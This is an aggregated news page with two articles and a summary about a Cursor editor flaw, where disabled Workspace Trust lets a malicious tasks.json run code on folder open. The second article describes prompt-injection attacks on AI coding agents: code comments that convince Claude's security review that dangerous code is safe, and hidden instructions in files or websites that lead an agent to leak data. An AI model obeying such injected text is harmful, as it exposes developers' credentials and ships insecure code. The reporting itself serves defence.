2 Sources
2 Sources
[1]
This 'critical' Cursor security flaw could expose your code to malware - how to fix it
A new report has uncovered what it describes as "a critical security vulnerability" in Cursor, the popular AI-powered code-editing platform. The report, published Wednesday by software company Oasis Security, found that code repositories within Cursor that contain the .vscode/tasks.json configuration can be instructed to automatically run certain functions as soon as the repositories are opened. Hackers could exploit that autorun feature via malware embedded into the code. Also: I did 24 days of coding in 12 hours with a $20 AI tool - but there's one big pitfall "This has the potential to leak sensitive credentials, modify files, or serve as a vector for broader system compromise, placing Cursor users at significant risk from supply chain attacks," Oasis wrote. While Cursor and other AI-powered coding tools like Claude Code and Windsurf have become popular among software developers, the technology is still fraught with bugs. Replit, another AI coding assistant that debuted its newest agent earlier this week, recently deleted a user's entire database. According to Oasis' report, the problem is rooted in the fact that Cursor's "Workplace Trust" feature is disabled by default. Basically, this feature is intended to be a verification step for Cursor users so that they only run code that they know and trust. Without it, the platform will automatically run code that's in a repository, leaving the window open for bad actors to surreptitiously slip in malware that could then jeopardize a user's system -- and from there, potentially spread throughout a broader network. Also: I asked AI to modify mission-critical code, and what happened next haunts me Running code without the Workplace Trust feature could open "a direct path to unauthorized access with an organization-wide blast radius," Oasis said. In a statement to Oasis that was published in the report, Cursor said that its platform operates with Workplace Trust deactivated by default since it interferes with some of the core automated features that users routinely depend on. "We recommend either enabling Workspace Trust or using a basic text editor when working with suspected malicious repositories," the company said. Also: That new Claude feature 'may put your data at risk,' Anthropic admits Cursor also told Oasis that it would soon publish updated security guidelines regarding the Workspace Trust feature. The solution, then, is to simply enable the Workplace Trust feature in Cursor. To do this, add the following security prompt to settings, and then restart the program: "security.workspace.trust.StartupPrompt": "always" ZDNET has reached out to Cursor for further comment.
[2]
Cursor AI Code Editor Flaw Enables Silent Code Execution via Malicious Repositories
A security weakness has been disclosed in the artificial intelligence (AI)-powered code editor Cursor that could trigger code execution when a maliciously crafted repository is opened using the program. The issue stems from the fact that an out-of-the-box security setting is disabled by default, opening the door for attackers to run arbitrary code on users' computers with their privileges. "Cursor ships with Workspace Trust disabled by default, so VS Code-style tasks configured with runOptions.runOn: 'folderOpen' auto-execute the moment a developer browses a project," Oasis Security said in an analysis. "A malicious .vscode/tasks.json turns a casual 'open folder' into silent code execution in the user's context." Cursor is an AI-powered fork of Visual Studio Code, which supports a feature called Workspace Trust to allow developers to safely browse and edit code regardless of where it came from or who wrote it. With this option disabled, an attacker can make available a project in GitHub (or any platform) and include a hidden "autorun" instruction that instructs the IDE to execute a task as soon as a folder is opened, causing malicious code to be executed when the victim attempts to browse the booby-trapped repository in Cursor. "This has the potential to leak sensitive credentials, modify files, or serve as a vector for broader system compromise, placing Cursor users at significant risk from supply chain attacks," Oasis Security researcher Erez Schwartz said. To counter this threat, users are advised to enable Workplace Trust in Cursor, open untrusted repositories in a different code editor, and audit them before opening them in the tool. The development comes as prompt injections and jailbreaks have emerged as a stealthy and systemic threat plaguing AI-powered coding and reasoning agents like Claude Code, Cline, K2 Think, and Windsurf, allowing threat actors to embed malicious instructions in sneaky ways to trick the systems into performing malicious actions or leaking data from software development environments. Software supply chain security outfit Checkmarx, in a report last week, revealed how Anthropic's newly introduced automated security reviews in Claude Code could inadvertently expose projects to security risks, including instructing it to ignore vulnerable code through prompt injections, causing developers to push malicious or insecure code past security reviews. "In this case, a carefully written comment can convince Claude that even plainly dangerous code is completely safe," the company said. "The end result: a developer - whether malicious or just trying to shut Claude up - can easily trick Claude into thinking a vulnerability is safe." Another problem is that the AI inspection process also generates and executes test cases, which could lead to a scenario where malicious code is run against production databases if Claude Code isn't properly sandboxed. The AI company, which also recently launched a new file creation and editing feature in Claude, has warned that the feature carries prompt injection risks due to it running in a "sandboxed computing environment with limited internet access." Specifically, it's possible for a bad actor to "inconspicuously" add instructions via external files or websites - aka indirect prompt injection - that trick the chatbot into downloading and running untrusted code or reading sensitive data from a knowledge source connected via the Model Context Protocol (MCP). "This means Claude can be tricked into sending information from its context (e.g., prompts, projects, data via MCP, Google integrations) to malicious third parties," Anthropic said. "To mitigate these risks, we recommend you monitor Claude while using the feature and stop it if you see it using or accessing data unexpectedly." That's not all. Late last month, the company also revealed browser-using AI models like Claude for Chrome can face prompt injection attacks, and that it has implemented several defenses to address the threat and reduce the attack success rate of 23.6% to 11.2%. "New forms of prompt injection attacks are also constantly being developed by malicious actors," it added. "By uncovering real-world examples of unsafe behavior and new attack patterns that aren't present in controlled tests, we'll teach our models to recognize the attacks and account for the related behaviors, and ensure that safety classifiers will pick up anything that the model itself misses." At the same time, these tools have also been found susceptible to traditional security vulnerabilities, broadening the attack surface with potential real-world impact - "As AI-driven development accelerates, the most pressing threats are often not exotic AI attacks but failures in classical security controls," Imperva said. "To protect the growing ecosystem of 'vibe coding' platforms, security must be treated as a foundation, not an afterthought."
Share
Share
Copy Link
A significant security vulnerability in the Cursor AI-powered code editor could allow hackers to execute malicious code when users open crafted repositories. The flaw stems from a default setting that disables a crucial security feature, potentially exposing users to various cyber threats.
A significant security flaw has been uncovered in Cursor, the popular AI-powered code-editing platform, potentially exposing users to malware and unauthorized code execution. The vulnerability, described as "critical" by software company Oasis Security, could have far-reaching implications for developers and organizations using the tool
1
.The security issue stems from Cursor's default configuration, which has the "Workplace Trust" feature disabled. This setting allows code repositories containing a specific configuration file (.vscode/tasks.json) to automatically execute certain functions as soon as they are opened. Hackers could exploit this autorun feature to embed malware into the code, potentially compromising entire systems and networks
1
2
.The implications of this vulnerability are severe. Oasis Security warns that it could lead to:
Erez Schwartz, a researcher at Oasis Security, emphasized the gravity of the situation, stating that this flaw places Cursor users at "significant risk from supply chain attacks"
2
.In a statement to Oasis Security, Cursor acknowledged the issue but explained that the Workplace Trust feature is deactivated by default as it interferes with some core automated features that users routinely depend on. The company recommended either enabling Workspace Trust or using a basic text editor when working with suspected malicious repositories. Cursor also promised to publish updated security guidelines regarding the Workspace Trust feature
1
.This incident highlights a growing concern in the rapidly evolving landscape of AI-powered coding tools. While platforms like Cursor, Claude Code, and Windsurf have gained popularity among developers, they are not immune to security vulnerabilities. Recent incidents, such as Replit accidentally deleting a user's entire database, underscore the potential risks associated with these emerging technologies
1
.Related Stories
The Cursor vulnerability is part of a broader trend of security challenges facing AI-powered coding and reasoning agents. Prompt injections and jailbreaks have emerged as stealthy and systemic threats, allowing attackers to embed malicious instructions in subtle ways. These attacks can trick AI systems into performing malicious actions or leaking sensitive data from software development environments
2
.To protect against this vulnerability and similar threats, experts recommend the following:
1
2
As AI-driven development continues to accelerate, it's crucial for both developers and organizations to prioritize security measures and treat them as foundational elements rather than afterthoughts in their development processes.
Summarized by
Navi
02 Aug 2025•Technology
26 Nov 2024•Technology
07 Aug 2025•Technology